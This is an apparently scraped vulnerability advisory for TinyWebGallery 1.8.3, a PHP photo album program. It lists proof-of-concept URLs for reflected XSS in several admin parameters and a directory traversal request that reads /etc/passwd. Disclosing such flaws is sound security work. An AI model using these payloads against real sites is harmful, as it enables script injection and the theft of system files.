TinyWebGallery 1.8.3 version multiple vulnerabilities-vulnerability warning-the black bar safety net

2011-02-04T00:00:00
ID MYHACK58:62201128979
Type myhack58
Reporter 佚名
Modified 2011-02-04T00:00:00

Description

TinyWebGallery is a php photo album program, TinyWebGallery 1.8.3 contains multiple security vulnerabilities, including directory traversal andXSS, may lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ Script: TinyWebGallery Version: 1.8.3 (No fixes yet, might work on other versions too). Home: http://www.tinywebgallery.com

[+]poc: ~~~~~~~~~ http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String. fromCharCode(88,83,83));" http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String. fromCharCode(88,83,83));" http://localhost/twg183/admin/index.php?dir=<script>alert("xss")</script> http://localhost/twg183/admin/index.php?action=chmod&item=<script>alert("xss")</script> http://localhost/twg183/twg183/admin/index.php?action=chmod&item="><script>alert("xss")</script>

http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/16090